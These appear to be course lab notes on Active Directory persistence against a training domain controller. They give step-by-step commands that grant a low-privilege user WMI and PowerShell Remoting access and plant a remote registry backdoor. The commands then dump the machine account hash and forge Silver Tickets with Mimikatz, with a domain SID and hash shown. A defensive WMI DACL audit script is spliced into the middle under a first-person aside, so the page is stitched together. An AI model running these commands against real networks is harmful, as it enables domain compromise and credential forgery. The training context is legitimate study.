Modify descriptor for WMI to allow user to access the WMI

. C:\AD\Tools\RACE.ps1

Set-RemoteWMI -SamAccountName student648 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose

Execute WMI Queries

gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
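From the defender's side, the descriptor change above is visible in the DACL of the WMI namespace itself. The following audit is an added example (not part of the page or the RACE toolkit): it reads the namespace security descriptor through the __SystemSecurity singleton and flags allow-ACEs that grant Remote Enable or WRITE_DAC to any trustee other than BUILTIN\Administrators, which by default is the only principal holding Remote Enable. The function names are my own; the access-mask constants are the documented WBEM bits.

```powershell
# Added audit example; constants are the documented WBEM access-mask bits.
$WBEM_REMOTE_ACCESS = 0x20      # "Remote Enable" right
$WRITE_DAC          = 0x40000   # right to rewrite the descriptor itself
$BuiltinAdminsSid   = 'S-1-5-32-544'

function Get-WmiNamespaceDacl {
    param(
        [string]$Namespace = 'root\cimv2',
        [string]$ComputerName = $env:COMPUTERNAME
    )
    # __SystemSecurity is the singleton that holds the namespace descriptor.
    $params = @{ Namespace = $Namespace; Path = '__SystemSecurity=@'; ComputerName = $ComputerName }
    (Invoke-WmiMethod @params -Name GetSecurityDescriptor).Descriptor.DACL
}

function Find-SuspiciousWmiAce {
    param(
        [string]$Namespace = 'root\cimv2',
        [string]$ComputerName = $env:COMPUTERNAME
    )
    foreach ($ace in Get-WmiNamespaceDacl -Namespace $Namespace -ComputerName $ComputerName) {
        if ($ace.AceType -ne 0) { continue }   # 0 = ACCESS_ALLOWED; deny ACEs cannot widen access
        $sid      = $ace.Trustee.SIDString
        $name     = '{0}\{1}' -f $ace.Trustee.Domain, $ace.Trustee.Name
        $remote   = ($ace.AccessMask -band $WBEM_REMOTE_ACCESS) -ne 0
        $writeDac = ($ace.AccessMask -band $WRITE_DAC) -ne 0
        # Out of the box only BUILTIN\Administrators hold Remote Enable on a namespace;
        # any other trustee with Remote Enable or WRITE_DAC deserves a closer look.
        if ($sid -ne $BuiltinAdminsSid -and ($remote -or $writeDac)) {
            [pscustomobject]@{
                Computer     = $ComputerName
                Namespace    = $Namespace
                Trustee      = $name
                Sid          = $sid
                RemoteEnable = $remote
                WriteDac     = $writeDac
                AccessMask   = ('0x{0:X}' -f $ace.AccessMask)
            }
        }
    }
}

# Run against the local host; pass -ComputerName to audit a remote system such as a DC.
Find-SuspiciousWmiAce -Namespace 'root\cimv2' | Format-Table -AutoSize
```

Running this before and after a baseline lets you diff the namespace DACL over time; an unexpected user or group showing up with RemoteEnable is the signal to investigate.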

The same can be done for PowerShell Remoting

Set-RemotePSRemoting -SamAccountName student648 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
Invoke-Command -ScriptBlock {whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
dcorp\student648

Modify remote registry permissions

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student648 

Retrieve the machine account hash

Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Creating a Silver Ticket with that hash

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'
